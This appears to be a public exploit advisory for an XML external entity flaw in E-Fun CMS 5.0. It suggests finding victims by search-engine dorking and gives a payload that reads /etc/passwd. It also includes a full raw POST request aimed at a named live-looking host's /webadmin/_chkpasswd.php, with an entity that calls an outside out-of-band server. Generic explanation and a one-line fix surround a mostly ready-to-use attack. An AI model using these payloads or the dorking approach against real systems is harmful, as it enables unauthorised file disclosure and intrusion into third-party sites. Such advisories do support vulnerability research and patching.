E-Fun CMS version 5.0 suffers from an XML external entity injection vulnerability.
====================================================================================================================================
| # Title : E-Fun CMS V5.0 XML external entity injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : http://www.e-fun.com.tw/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Vulnerability description :
XML supports a facility known as "external entities",
which instruct an XML processor to retrieve and perform
an inline include of XML located at a particular URI.
An external XML entity can be used to append or modify
the document type declaration (DTD) associated with an
XML document. An external XML entity can also be used
to include XML within the content of an XML document.
Now assume that the XML processor parses data originating
from a source under attacker control. Most of the time
the processor will not be validating, but it MAY include
the replacement text thus initiating an unexpected file
open operation, or HTTP transfer, or whatever system ids
the XML processor knows how to access.
below is a sample XML document that will use this functionality
to include the contents of a local file (/etc/passwd)
target : http://127.0.0.1/landtopcomtw/webadmin/
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE indoushka [
<!ENTITY indoushka SYSTEM "file:///etc/passwd">
]>
<xxx>&indoushka;</xxx>
POST /webadmin/_chkpasswd.php HTTP/1.1
Content-type: text/xml
Host: landtop.com.tw
Content-Length: 175
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dt5fqyt [
<!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">
]>
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>
[+] Affected items :
/webadmin/
/webadmin/_chkpasswd.php
/webadmin/index.php
[+] The impact of this vulnerability :
Attacks can include disclosing local files,
which may contain sensitive data such as passwords
or private user data, using file: schemes or relative
paths in the system identifier. Since the attack occurs
relative to the application processing the XML document,
an attacker may use this trusted application to pivot
to other internal systems, possibly disclosing
other internal content via http(s) requests.
[+] How to fix this vulnerability :
If possible it's recommended to disable parsing of XML external entities.
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
